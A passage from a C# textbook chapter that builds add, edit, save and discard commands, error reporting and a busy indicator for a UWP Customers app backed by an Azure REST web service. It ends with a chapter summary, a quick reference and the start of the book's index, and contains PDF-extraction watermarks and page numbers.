IsAdding This property indicates whether the ViewModel is in
Adding mode. In this mode, the FirstCustomer, LastCustomer,
PreviousCustomer, and NextCustomer commands are disabled.
You will define an AddCustomer command, a SaveChanges
command, and a DiscardChanges command that will be enabled
in this mode.
IsEditing This property indicates whether the ViewModel is in
Editing mode. As in Adding mode, in this mode, the
FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands are disabled. You will define an
EditCustomer command that will be enabled in this mode. The
SaveChanges command and DiscardChanges command will also
Download from finelybook [email protected]
1059
be enabled, but the AddCustomer command will be disabled. The
EditCustomer command will be disabled in Adding mode.
IsAddingOrEditing This property indicates whether the
ViewModel is in Adding or Editing mode. You will use this
property in the methods that you define in this exercise.
CanBrowse This property returns true if the ViewModel is in
Browsing mode and there is an open connection to the web
service. The code in the constructor that creates the
FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands has been updated to use this property to
determine whether these commands should be enabled or
disabled, as follows:
Click here to view code image
public ViewModel(){
...
this.NextCustomer = new Command(this.Next,
() => { return this.CanBrowse &&
this.customers != null && !this.IsAtEnd;
}); this.PreviousCustomer = new Command(this.Previous,
() => { return this.CanBrowse &&
this.customers != null && !this.IsAtStart;
});
this.FirstCustomer = new Command(this.First,
() => { return this.CanBrowse & &
this.customers != null && !this.IsAtStart;
})
this.LastCustomer = new Command(this.Last,
() => { return this.CanBrowse &&
this.customers != null && !this.IsAtEnd;
});}
CanSaveOrDiscardChanges This property returns true if the
ViewModel is in Adding or Editing mode and has an open
connection to the web service.
The Methods For Fetching And Updating Data region contains the
following methods:
ValidateCustomer This method takes a Customer object and
examines the FirstName and LastName properties to ensure that
they are not empty. It also inspects the EmailAddress and Phone
properties to verify that they contain information that is in a valid
Download from finelybook [email protected]
1060
format. The method returns true if the data is valid and false
otherwise. You will use this method when you create the
SaveChanges command later in this exercise.
Note The code that validates the EmailAddress and Phone
properties performs regular expression matching by using the
Regex class defined in the System.Text.RegularExpressions
namespace. To use this class, you define a regular expression
in a Regex object that specifies the pattern that the data should
match, and then you invoke the IsMatch method of the Regex
object with the data that you need to validate. For more
information about regular expressions and the Regex class,
see “The Regular Expression Object Model” on the Microsoft
website at http://msdn.microsoft.com/library/30wbz966.
CopyCustomer The purpose of this method is to create a
shallow copy of a Customer object. You will use it when you
create the EditCustomer command to make a copy of the original
data of a customer before it is changed. If the user decides to
discard the changes, the original data can simply be copied back
from the copy made by this method.
6. In the ViewModel.cs file, find the Methods For Fetching And Updating
Data region (expand this region if necessary). In this region, above the
ValidateCustomer method, create the Add method shown here:
Click here to view code image
// Create a new (empty) customer
// and put the form into Adding mode
private void Add()
{
Customer newCustomer = new Customer { CustomerID = 0 };
this.customers.Insert(currentCustomer, newCustomer);
this.IsAdding = true;
this.OnPropertyChanged(nameof(Current));
Download from finelybook [email protected]
1061
}
This method creates a new Customer object. It is empty apart from the
CustomerID property, which is temporarily set to 0 for display purposes.
The real value for this property is generated when the customer is saved
to the database, as described earlier. The customer is added to the
customers list (the view uses data binding to display the data in this list),
the ViewModel is placed in Adding mode, and the PropertyChanged
event is raised to indicate that the Current customer has changed.
7. Add the following Command variable shown in bold to the list at the
start of the ViewModel class:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public Command LastCustomer { get; private set; }
public Command AddCustomer { get; private set; }
...
}
8. In the ViewModel constructor, instantiate the AddCustomer command as
shown here in bold:
Click here to view code image
public ViewModel()
{
...
this.LastCustomer = new Command(this.Last, ...);
this.AddCustomer = new Command(this.Add,
() => { return this.CanBrowse; });
...
}
This code references the Add method that you just created. The
command is enabled if the ViewModel has a connection to the web
service and is in Browsing mode (the AddCustomer command will not
be enabled if the ViewModel is already in Adding mode).
9. After the Add method in the Methods For Fetching And Updating Data
region, create a private Customer variable called oldCustomer and
define another method called Edit:
Click here to view code image
Download from finelybook [email protected]
1062
// Edit the current customer
// - save the existing details of the customer
// and put the form into Editing mode
private Customer oldCustomer;
private void Edit ()
{
this.oldCustomer = new Customer();
this.CopyCustomer(this.Current, this.oldCustomer);
this.IsEditing = true;
}
This method copies the details of the Current customer to the
oldCustomer variable and puts the ViewModel into Editing mode. In
this mode, the user can change the details of the current customer. If the
user subsequently decides to discard these changes, the original data can
be copied back from the oldCustomer variable.
10. Add the following Command variable shown in bold to the list at the
start of the ViewModel class:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public Command AddCustomer { get; private set; }
public Command EditCustomer { get; private set; }
...
}
11. In the ViewModel constructor, instantiate the EditCustomer command as
shown in bold in the following code:
Click here to view code image
public ViewModel()
{
...
this.AddCustomer = new Command(this.Add, ...);
this.EditCustomer = new Command(this.Edit,
() => { return this.CanBrowse; });
...
}
This code is similar to the statement for the AddCustomer command,
except that it references the Edit method.
Download from finelybook [email protected]
1063
12. After the Edit method in the Methods For Fetching And Updating Data
region, add a method named Discard to the ViewModel class, as shown
here:
Click here to view code image
// Discard changes made while in Adding or Editing mode
// and return the form to Browsing mode
private void Discard ()
{
// If the user was adding a new customer, then remove it
if (this.IsAdding)
{
this.customers.Remove(this.Current);
this.OnPropertyChanged(nameof(Current));
}
// If the user was editing an existing customer,
// then restore the saved details
if (this.IsEditing)
{
this.CopyCustomer(this.oldCustomer, this.Current);
}
this.IsBrowsing = true;
}
The purpose of this method is to enable the user to discard any changes
made when the ViewModel is in Adding or Editing mode. If the
ViewModel is in Adding mode, the current customer is removed from
the list (this is the new customer created by the Add method), and the
PropertyChanged event is raised to indicate that the current customer in
the customers list has changed. If the ViewModel is in Editing mode, the
original details in the oldCustomer variable are copied back to the
currently displayed customer. Finally, the ViewModel is returned to
Browsing mode.
13. Add the DiscardChanges Command variable to the list at the start of the
ViewModel class, and update the constructor to instantiate this
command, as shown here in bold:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public Command EditCustomer { get; private set; }
Download from finelybook [email protected]
1064
public Command DiscardChanges { get; private set; }
...
public ViewModel()
{
...
this.EditCustomer = new Command(this.Edit, ...);
this.DiscardChanges = new Command(this.Discard,
() => { return this.CanSaveOrDiscardChanges; });
}
...
}
Notice that the DiscardChanges command is enabled only if the
CanSaveOrDiscardChanges property is true, the ViewModel has a
connection to the web service, and the ViewModel is in Adding or
Editing mode.
14. In the Methods For Fetching And Updating Data region, after the
Discard method, add one more method, named SaveAsync, as shown in
the code that follows. This method should be marked with the async
modifier.
Click here to view code image
// Save the new or updated customer back to the web service
// and return the form to Browsing mode
private async void SaveAsync()
{
if (this.ValidateCustomer(this.Current))
{
try
{
AdventureWorksService service = new
AdventureWorksService();
if (this.IsAdding)
{
// If the user is adding a new customer, post
the details back
to the web service
var cust = await
service.CustomersOperations.PostCustomerAsync
(this.Current);
this.CopyCustomer(cust, this.Current);
this.OnPropertyChanged(nameof(Current));
this.IsAdding = false;
this.IsBrowsing = true;
}
else
{
Download from finelybook [email protected]
1065
// If the user is updating an existing customer,
perform a PUT
operation instead
await
service.CustomersOperations.PutCustomerAsync(
this.Current.CustomerID, this.Current);
this.IsAdding = false;
this.IsBrowsing = true;
}
}
catch (Exception e)
{
// TODO: Handle any errors
}
}
}
The ValidateCustomer method ensures that the current customer
displayed by the app contains valid data, such as a non-null first and last
name, a correctly formatted email address, and telephone number that
only contains valid characters. If the details are valid, the code in the try
block determines whether the user is adding a new customer or editing
the details of an existing customer. If the user is adding a new customer,
the code sends a POST message to the web service by using the
PostCustomerAsync method of the REST API client model. This
operation might take a little time, so the code uses the asynchronous
version of the operation to prevent the UI of the Customers app from
freezing.
Keep in mind that the POST request is sent to the PostCustomer method
in the CustomersController class in the web service, and this method
expects a Customer object as its parameter. The details are transmitted in
JSON format. You might also recall that the CustomerID column in the
Customer table in the AdventureWorks database contains automatically
generated values. The user does not provide a value for this data when a
customer is created; rather, the database itself generates the value when
a customer is added to the database. In this way, the database can ensure
that each customer has a unique customer ID. The value returned by the
PostCustomerAsync method in the REST API client model returns the
details for the newly created customer, including the customer ID. The
code that you have added updates the details displayed by the Customers
app with the new data.
Download from finelybook [email protected]
1066
If the user is editing an existing customer, the app generates a PUT
request that is passed to the PutCustomer method in the
CustomersController class in the web service by using the
PutCustomerAsync method of the REST API client model. The
PutCustomerAsync method updates the details of the customer in the
database and expects the customer ID and customer details as
parameters. Again, this data is transmitted to the web service in JSON
format.
15. Add the SaveChanges Command variable shown here to the list at the
start of the ViewModel class, and update the constructor to instantiate
this command, as shown in the following:
Click here to view code image
public class ViewModel : INotifyPropertyChanged
{
...
public Command DiscardChanges { get; private set; }
public Command SaveChanges { get; private set; }
...
public ViewModel()
{
...
this.DiscardChanges = new Command(this.Discard, ...);
this.SaveChanges = new Command(this.SaveAsync,
() => { return this.CanSaveOrDiscardChanges; });
...
}
...
}
16. On the Build menu, click Build Solution and verify that your app
compiles without any errors.
The web service needs to be updated to support the edit functionality.
Specifically, if you are adding or editing a customer, you should set the
ModifiedDate property of the customer to reflect the date on which the
change was made. Additionally, if you are creating a new customer, you must
populate the rowguid property of the Customer object with a new GUID
before you can save it. (This is a mandatory column in the Customer table;
other apps inside the Adventure Works organization can use this column to
track information about customers.)
Download from finelybook [email protected]
1067
Note GUID stands for globally unique identifier. A GUID is a string,
generated by Windows, that is almost guaranteed to be unique (there is
a very small possibility that Windows might generate a nonunique
GUID, but the possibility is so infinitesimally small that it can be
discounted). GUIDs are frequently used by databases as key values used
to identify individual rows, as in the case of the Customer table in the
AdventureWorks database.
Update the web service to support add and edit functionality
1. In Solution Explorer, in the AdventureWorksService project, expand the
Controllers folder and open the CustomersController.cs file to display it
in the Code and Text Editor window.
2. In the PostCustomer method, before the statements that save the new
customer in the database, add the following code shown in bold.
Click here to view code image
// POST api/Customers
[ResponseType(typeof(Customer))]
public async Task<IHttpActionResult> PostCustomer(Customer
customer)
{
if (!ModelState.IsValid)
{
...
}
customer.ModifiedDate = DateTime.Now;
customer.rowguid = Guid.NewGuid();
db.Customers.Add(customer);
await db.SaveChangesAsync();
...
}
3. In the PutCustomer method, update the ModifiedDate property of the
customer before the statement that indicates that the customer has been
modified, as shown here in bold:
Download from finelybook [email protected]
1068
Click here to view code image
// PUT api/Customers/5
[ResponseType(typeof(void))]
public async Task<IHttpActionResult> PutCustomer(int id,
Customer customer)
{
...
customer.ModifiedDate = DateTime.Now;
db.Entry(customer).State = EntityState.Modified;
...
}
4. Redeploy the web service to the cloud again, as follows:
a. In Solution Explorer, right-click the AdventureWorksService project,
and then click Publish.
b. On the Publish page of the wizard, click Publish. This action should
overwrite the existing web service that you deployed to Azure earlier.
Correcting a problem with the REST API client
code
At the time of writing, I found an issue with the code generated by
Visual Studio for the REST API client model. Specifically, the
PostCustomerWithHttpMessagesAsync method does not handle the
HTTP Created response that a REST web service is likely to send back
when a new entity is successfully added. Currently, the
PostCustomerWithHttpMessagesAsync method constructs an HTTP
POST request which it sends to the web service. It waits for the
response, and if the HTTP status code in the response is anything other
than 200 (the HTTP status code for OK), it throws an exception.
However, a REST web service is allowed to send back other 2xx status
codes, all of which can indicate success. For example, a POST request
is likely to result in the status code 201 (Created) rather than a plain 200
(OK).
Although it goes against the previous advice given of not directly
editing the code generated by Visual Studio for the REST API client
model, the simplest solution is to change this code manually, as follows:
Download from finelybook [email protected]
1069
1. In Solution Explorer, in the Customers project, expand the
AdventureWorksService nnnnnnnnn folder, expand Models, and
double-click the CustomerOperations.cs file to display it in the
Code and Text Editor window.
2. Find the PostCustomerWithHttpMessagesAsync method.
3. In this method, find the following line:
if ((int)_statusCode != 200)
4. Change this line as follows, in bold:
Click here to view code image
if ((int)_statusCode != 200 && (int)_statusCode != 201)
5. Still in the PostCustomerWithHttpMessagesAsync method, find the
following code:
Click here to view code image
// Deserialize response
if ((int)_statusCode == 200)
6. Change this code as follows, in bold:
Click here to view code image
// Deserialize response
if ((int)_statusCode == 200 || (int)_statusCode == 201)
7. On the Build menu, click Rebuild Solution.
This issue might be fixed in future updates to Visual Studio, so
check first before making these changes to your code.
Reporting errors and updating the UI
You have added the commands by which a user can retrieve, add, edit, and
save customer information. However, if something goes wrong and an error
occurs, the user is not going to know what has happened because the
ViewModel class does not include any error-reporting capabilities. One way
to add such a feature is to capture the exception messages that occur and
Download from finelybook [email protected]
1070
expose them as a property of the ViewModel class. A view can use data
binding to connect to this property and display the error messages.
Add error reporting to the ViewModel class
1. Return to the Customers project and display the ViewModel.cs file in
the Code and Text Editor window.
2. After the ViewModel constructor, add the private _lastError string
variable and public LastError string property shown here:
Click here to view code image
private string _lastError = null;
public string LastError
{
get => this._lastError;
private set
{
this._lastError = value;
this.OnPropertyChanged(nameof(LastError));
}
}
3. Find the ValidateCustomer method, and add the following statement
shown in bold immediately before the return statement:
Click here to view code image
private bool ValidateCustomer(Customer customer)
{
...
this.LastError = validationErrors;
return !hasErrors;
}
The ValidateCustomer method populates the validationErrors variable
with information about any properties in the Customer object that
contain invalid data. The statement that you have just added copies this
information to the LastError property.
4. Find the SaveAsync method. In this method, add the following code
shown in bold to catch any errors and HTTP web service failures:
Click here to view code image
private async void SaveAsync()
Download from finelybook [email protected]
1071
{
// Validate the details of the Customer
if (this.ValidateCustomer(this.Current))
{
...
try
{
...
if (this.IsAdding)
{
...
this.IsBrowsing = true;
this.LastError = String.Empty;
}
else
{
...
this.IsBrowsing = true;
this.LastError = String.Empty;
}
}
catch (Exception e)
{
// TODO: Handle any errors
this.LastError = e.Message;
}
}
}
5. Find the Discard method, and then add the statement shown here in bold
to the end of it:
Click here to view code image
private void Discard()
{
...
this.IsBrowsing = true;
this.LastError = String.Empty;
}
6. On the Build menu, click Build Solution and verify that the app builds
without any errors.
The ViewModel is now complete. The final stage is to incorporate the
new commands, state information, and error-reporting features into the view
provided by the Customers form.
Integrate add and edit functionality into the Customers form
Download from finelybook [email protected]
1072
1. Open the MainPage.xaml file in the Design View window.
The XAML markup for the MainPage form has already been modified,
and the following TextBlock controls have been added to the Grid
controls that display the data:
Click here to view code image
<Page
x:Class="Customers.MainPage"
...>
<Grid Style="{StaticResource GridStyle}">
...
<Grid x:Name="customersTabularView" ...>
...
<Grid Grid.Row="2">
...
<TextBlock Grid.Row="6" Grid.Column="1"
Grid.ColumnSpan="7" Style="{StaticResource ErrorMessageStyle}"/>
</Grid>
</Grid>
<Grid x:Name="customersColumnarView"
Margin="20,10,20,110" ...>
...
<Grid Grid.Row="1">
...
<TextBlock Grid.Row="6" Grid.Column="0"
Grid.ColumnSpan="2" Style="{StaticResource ErrorMessageStyle}"/>
</Grid>
</Grid>
...
</Grid>
...
</Page>
The ErrorMessageStyle referenced by these TextBlock controls is
defined in the AppStyles.xaml file.
2. Set the Text property of both TextBlock controls to bind to the LastError
property of the ViewModel, as shown here in bold:
Click here to view code image
...
<TextBlock Grid.Row="6" Grid.Column="1" Grid.ColumnSpan="7"
Style="{StaticResource ErrorMessageStyle}" Text="{Binding
LastError}"/>
...
<TextBlock Grid.Row="6" Grid.Column="0" Grid.ColumnSpan="2"
Download from finelybook [email protected]
1073
Style="{StaticResource ErrorMessageStyle}" Text="{Binding
LastError}"/>
3. The TextBox and ComboBox controls that display customer data on the
form should allow the user to modify this data only if the ViewModel is
in Adding or Editing mode; otherwise, they should be disabled. Add the
IsEnabled property to each of these controls and bind it to the
IsAddingOrEditing property of the ViewModel as follows:
Click here to view code image
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id"
IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName"
IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName"
IsEnabled="{Binding IsAddingOrEditing}" .../>
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title"
IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="3" Grid.Column="3" ... x:Name="email"
IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" ... x:Name="phone"
IsEnabled="{Binding IsAddingOrEditing}" .../>
...
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" />
IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName"
IsEnabled="{Binding IsAddingOrEditing}" .../>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle"
IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail"
IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone"
IsEnabled="{Binding IsAddingOrEditing}" .../>
4. Add a command bar to the bottom of the page, immediately after the top
command bar, using the <Page.BottomAppBar> element. This
command bar should contain buttons for the AddCustomer,
EditCustomer, SaveChanges, and DiscardChanges commands, as
follows:
Download from finelybook [email protected]
1074
Click here to view code image
<Page ...>
...
<Page.TopAppBar >
...
</Page.TopAppBar>
<Page.BottomAppBar>
<CommandBar>
<AppBarButton x:Name="addCustomer" Icon="Add"
Label="New Customer" Command="{Binding Path=AddCustomer}"/>
<AppBarButton x:Name="editCustomer" Icon="Edit"
Label="Edit Customer" Command="{Binding Path=EditCustomer}"/>
<AppBarButton x:Name="saveChanges" Icon="Save"
Label="Save Changes" Command="{Binding Path=SaveChanges}"/>
<AppBarButton x:Name="discardChanges" Icon="Undo"
Label="Undo Changes" Command="{Binding Path=DiscardChanges}"/>
</CommandBar>
</Page.BottomAppBar>
</Page>
Note that the icons referenced by the buttons are the standard images
provided with the Blank App template.
When the user clicks Save Changes, the interaction with the web service
might be quick, or it could take a few seconds, depending on the speed of the
HTTP connection to Azure, and the load on the database behind the web
service. It would be helpful to let users know when the application is saving
the data, that although the app might appear to be doing nothing, it is active
behind the scenes. In a UWP app, you can use a ProgressRing control to
provide a visual cue. This control should be displayed when the ViewModel
is busy communicating with the web service but be inactive otherwise.
Add a busy indicator to the Customers form
1. Display the ViewModel.cs file in the Code and Text Editor window.
After the LastError property, add the private _isBusy field and public
IsBusy property, as shown here:
Click here to view code image
private bool _isBusy;
public bool IsBusy
{
get => this._isBusy;
set
Download from finelybook [email protected]
1075
{
this._isBusy = value;
this.OnPropertyChanged(nameof(IsBusy));
}
}
2. Modify the SaveAsync method and add the following statements shown
in bold. These statements set and reset the IsBusy indicator while the
method runs:
Click here to view code image
private async void SaveChanges()
{
this.IsBusy = true;
if (this.ValidateCustomer(this.Current))
{
...
}
this.IsBusy = false;
}
3. Open the MainPage.xaml file in the Design View window.
4. In the XAML pane, add the ProgressRing control shown in bold in the
following code as the first item in the top-level Grid control:
Click here to view code image
<Grid Style="{StaticResource GridStyle}">
<ProgressRing HorizontalAlignment="Center"
VerticalAlignment="Center" Foreground="AntiqueWhite"
Height="100"
Width="100" IsActive="{Binding IsBusy}" Canvas.ZIndex="1"/>
<Grid x:Name="customersTabularView" Margin="40,104,0,0" ...>
...
Setting the Canvas.ZIndex property to “1” ensures that the
ProgressRing appears in front of the other controls displayed by the
Grid control.
Test the Customers app
1. On the Debug menu, click Start Debugging to build and run the app.
When the Customers form appears, notice that the TextBox and
ComboBox controls are disabled because the view is in Browsing mode.
Download from finelybook [email protected]
1076
2. On the form, verify that both the upper and lower command bars appear.
You can use the First, Next, Previous, and Last buttons in the upper
command bar as before (remember that the First and Previous buttons
will not be enabled until you move away from the first customer). In the
lower command bar, the Add and Edit buttons should be enabled, but
the Save Changes button and the Undo Changes button should be
disabled because the AddCustomer and EditCustomer commands are
enabled when the ViewModel is in Browsing mode, and the
SaveChanges and DiscardChanges commands are enabled only when
the ViewModel is in Adding or Editing mode.
3. In the bottom command bar, click the Edit Customer button.
4. The buttons in the top command bar become disabled because the
Download from finelybook [email protected]
1077
ViewModel is now in Editing mode. Additionally, the Add and Edit
buttons are also disabled, but the Save Changes and Undo Changes
buttons should now be enabled. Furthermore, the data entry fields on the
form should also be enabled, and the user can modify the details of the
customer.
5. Change the details of the customer: blank out the first name, type Test
for the email address, type Test 2 for the phone number, and then click
Save Changes.
Note You must tab out of the phone number control (or click
another control on the main part of the form, or even click the form
itself) for the binding to copy the data to the view model and report
the illegal phone number. The same is true for any controls on the
form. This is due to the underlying mechanism implemented by
UWP apps; data in a bound control is not copied back to the data
source until the control loses focus. Clicking a button in a
command bar does not cause a change of focus, although tabbing
to a button does.
These changes violate the validation rules implemented by the
ValidateCustomer method. The ValidateCustomer method populates the
LastError property of the ViewModel with validation messages, which
are displayed on the form in the TextBlock that binds to the LastError
property:
Download from finelybook [email protected]
1078
6. Click Undo Changes, and verify that the original data is reinstated on the
form. The validation messages disappear, and the ViewModel reverts to
Browsing mode.
7. Click Add. The fields on the form should be cleared (apart from the ID
field, which displays the value 0). Enter the details for a new customer.
Be sure to provide a first name and last name, a valid email address of
the form [email protected], and a numeric phone number (you
can also include parentheses, hyphens, and spaces).
8. Click Save Changes. If the data is valid (there are no validation errors),
your data should be saved to the database. You should see the ID
generated for the new customer in the ID field, and the ViewModel
should switch back to Browsing mode.
Download from finelybook [email protected]
1079
9. Experiment with the app by adding and editing more customers. Notice
that you can resize the view to display the columnar layout, and the form
should still work.
Note When you click Save Changes, you might or might not see
the progress ring appear, depending on how quickly the changes
are saved. If you want to simulate the operation running more
slowly, add the following statement near to the end of the
SaveAsync method:
Click here to view code image
private async void SaveChanges()
{
...
await Task.Delay(2000);
this.IsBusy = false;
}
This code causes a delay of 2 seconds.
10. When you have finished, return to Visual Studio and stop debugging.
Summary
In this chapter, you learned how to use the Entity Framework to create an
entity model that you can use to connect to a SQL Server database. The
database can be running locally or in the cloud. You also saw how to create a
REST web service that a UWP app can use to query and update data in the
database through the entity model, and you learned how to integrate code that
calls the web service into a ViewModel.
You have now completed all the exercises in this book. I hope you are
thoroughly conversant with the C# language and understand how to use
Visual Studio 2017 to build professional apps for Windows 10. However, this
Download from finelybook [email protected]
1080
is not the end of the story. You have cleared the first hurdle, but the best C#
programmers learn from continued experience, and you can gain this
experience only by building C# apps. As you do so, you will discover new
ways to use the C# language and many features in Visual Studio 2017 that I
have not had space to cover in this book. Also, remember that C# is an
evolving language. Back in 2001, when I wrote the first edition of this book,
C# introduced the syntax and semantics necessary to build apps that made
use of Microsoft .NET Framework 1.0. Some enhancements were added to
Visual Studio and .NET Framework 1.1 in 2003, and then in 2005, C# 2.0
emerged with support for generics and .NET Framework 2.0. C# 3.0 added
numerous features, such as anonymous types, lambda expressions, and, most
significantly, LINQ. C# 4.0 extended the language further with support for
named arguments, optional parameters, contravariant and covariant
interfaces, and integration with dynamic languages. C# 5.0 added full support
for asynchronous processing through the async keyword and the await
operator. C# 6.0 provided further tweaks to the language, such as expression-
bodied methods, string interpolation, the nameof operator, exception filters,
and many others. C# 7 includes many additional features, such as Tuples,
local functions in methods, support for expression-bodied members in
properties and other scenarios, pattern matching in switch statements, the
ability to handle and throw exceptions in new ways, enhanced syntax for
defining numeric literals, and a general tidying up of the way in which you
can define and use out variables.
In parallel with the evolution of the C# programming language, the
Windows operating system has changed considerably since the first edition of
this book. Arguably, the changes instigated by Windows 8 onward have been
the most radical in this period, and developers familiar with earlier editions of
Windows now have exciting new challenges to build apps for the modern,
touch-centric, mobile platform that Windows 10 provides. Furthermore,
modern business apps are extending beyond the boundaries of the
organization and out to the cloud, requiring you to implement highly scalable
solutions that might need to support thousands or even millions of concurrent
users. Visual Studio 2017, together with Azure and C# will undoubtedly be
instrumental in assisting you to address these challenges.
Quick reference
Download from finelybook [email protected]
1081
To
Do this
Create an
entity
model by
using the
Entity
Framework
Add a new item to your project by using the ADO.NET Entity
Data Model template. Use the Entity Data Model Wizard to
connect to the database containing the tables that you want to
model and select the tables that your app requires.
In the data model, remove any columns that are not used by your
app (as long as they have default values), if your app is inserting
new items into the database).
Create a
REST web
service that
provides
remote
access to a
database
through an
entity
model
Create an Azure API App using the ASP.NET web Application.
Run the Add Scaffold wizard and select Web API 2 Controller
With Actions, Using Entity Framework. Specify the name of the
appropriate entity class from the entity model as the model class,
and the data context class for the entity model as the data context
class.
Deploy a
REST web
service to
the cloud
as an
Azure API
app
In Visual Studio, connect to your Azure subscription. Then use the
Publish Web wizard to publish your web service as an Azure App
Service. Specify an appropriate service plan that will support the
volume of traffic that your web service expects to handle.
Consume a
REST web
service
published
as an
Azure API
app in a
UWP
application
Run the REST API Client wizard in Visual Studio, and specify the
Azure API app that provides access to your web service. The
wizard downloads the metadata for the web service and creates a
model which it adds to your project.
Retrieve
data from a
Instantiate the connection class defined by the model created by
the REST API Client wizard. Call the appropriate Get method in
Download from finelybook [email protected]
1082
REST web
service in a
UWP app
the Operations object available through the connection class. For
example:
Click here to view code image
AdventureWorksService service = new AdventureWorksService();
var data = service.CustomersOperations.GetCustomers();
Add a new
data item
to a REST
web
service
from a
UWP app
Use the appropriate Post method of the Operations object available
through the connection class. Pass the new data item as the
parameter to this method. If the operation is successful, the value
returned is a copy of the newly created object. For example:
Click here to view code image
AdventureWorksService service = new AdventureWorksService();
var cust = await
service.CustomersOperations.PostCustomerAsync(this.Current);
Update an
existing
item in a
REST web
service
from a
UWP app
Use the appropriate Put method of the Operations object available
through the connection class. Pass the key and the data for the
modified data as parameters. For example:
Click here to view code image
AdventureWorksService service = new AdventureWorksService();
await service.CustomersOperations.PutCustomerAsync
(this.Current.CustomerID, this.Current);
Download from finelybook [email protected]
1083
Index
Symbols
& (ampersand)
& (AND) operator, 365
&& (logical AND) operator, 365
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
< entity, 109
in XML, 109
< > (angle brackets)
>= (greater than or equal to) operator, 96, 99, 112
> (greater than) operator, 96, 99, 112
<< (left-shift) operator, 365
<= (less than or equal to) operator, 96, 99, 112
< (less than) operator, 96, 99, 112
in XML, 109
* (asterisk)
*= (compound multiplication) operator, 116
* (multiplication) operator, 47
@ (at sign), 184
{ } (braces), 54, 62, 64, 179, 231, 252
^ (caret), XOR operator, 366
= (equal sign)
Download from finelybook [email protected]
1084
= (assignment) operator, 39
associativity, 54–56, 99
precedence, 99
== (equality) operator, 96, 99, 112, 510
=> (lambda) operator, 64, 425
! (exclamation mark)
!= (inequality) operator, 96, 99, 112, 510
! (NOT) operator, 96
/ (forward slash)
/= (compound division) operator, 116
/ (division) operator, 47
- (hyphen)
-= (compound subtraction) operator, 116, 455, 467, 476
-- (decrement) operator, 56–57, 59, 116, 146, 508–509
- (subtraction) operator, 47
() (parentheses)
in if statements, 100
in method calls, 62, 66
precedence override, 54
% (percent sign)
%= (compound modulus) operator, 116
% (modulus) operator, 48
. (period)
dot notation, 284
dot operator, 316
| (pipe)
|| (logical OR) operator
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
| (OR) operator, 365
Download from finelybook [email protected]
1085
+ (plus sign)
+ (addition) operator, 47
+= (compound addition) operator, 116, 466, 476
++ (increment) operator, 56–57, 59, 116, 146, 508–509
? (question mark)
indicating nullable types with, 191–192, 210
? (null-conditional) operator, 190–191, 207
" (quotation marks, double), 111
as delimiters, 111
in XML, 109
' (quotation marks, single), 111
; (semicolon)
in enumeration variable declarations, 227
in method declarations, 63
statement termination, 35–36, 38
in structure variable declarations, 227
[ ] (square brackets), 54, 229, 252
~ (tilde)
in destructor declarations, 317, 335
~ (NOT) operator, 365
_ (underscore), 38, 364
A
abstract classes
abstract methods, 306
declaring, 314
defining, 305–306
implementing, 307–311
quick reference, 314
sealed classes, 306–307
sealed methods, 307
Download from finelybook [email protected]
1086
abstract keyword, 306, 313, 314
abstract methods, 306
abstracting tasks, 545–549
Accelerate method, 280
accessibility
of classes, 162–163
of properties, 346
accessor methods, 368–369
indexers, 368
properties, 342–343
Action type, 529, 676
Action<T, …> delegates, 452
adapter methods, 464–465
Add Controller dialog box, 719
Add Existing Project dialog box, 446
Add method, 413, 419, 421, 423, 432, 455, 737
Add Reference command, 17
Add Scaffold wizard, 718
AddAfter method, 415
AddBefore method, 415
AddCardToHand method, 246, 430
AddCustomer command, 736
AddFirst method, 415
AddItemToLocalCache method, 583
addition (+) operator, 47
AddLast method, 415
AddParticipant method, 596
AddToAccumulator method, 550
addValues method, 51, 62–65, 143
ADO.NET, 709–710
AdventureWorksEntities class, 716–717
AdventureWorksModel class, 712–713
Download from finelybook [email protected]
1087
AdventureWorksService class, 710–712, 731
AdventureWorksService project. See also Customers application
AdventureWorks database
entity model, 709–717
REST web service deployment, 724–726
retrieving data from, 707–709
entity model, creating, 710–717
AdventureWorksEntities, 716–717
AdventureWorksModel, 712–713
AdventureWorksService, 710–712
Entity Data Model Wizard, 712–716
REST web service
adding/editing data with, 733–741
Azure API app security, 729–730
creating, 718–724
deploying to Azure, 724–726
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732
AggregateException, 562–563, 565
aggregating data, 485–487
Airplane class, 279–280
All method, 491
allocation of memory, asynchronous methods and, 582–583
ampersand (&)
AND (&) operator, 365
logical AND (&&) operator, 365
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
in XML, 109
Download from finelybook [email protected]
1088
AND operators
AND (&), 365
logical AND (&&), 97
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
angle brackets (<>)
greater than (>) operator, 96, 99, 112
greater than or equal to (>=) operator, 96, 99, 112
left-shift (<<) operator, 365
less than (<) operator, 96, 99, 112
less than or equal to (<=) operator, 96, 99, 112
in XML, 109
anonymous classes, 179–180
anonymous methods, 426–427
Any method, 491
AppBarButton control, 683
App.config file, 8
application logic, decoupling
delegates
Action<T, …>452
adding methods to, 455
in automated factory scenario, 453–456
declaring, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>452
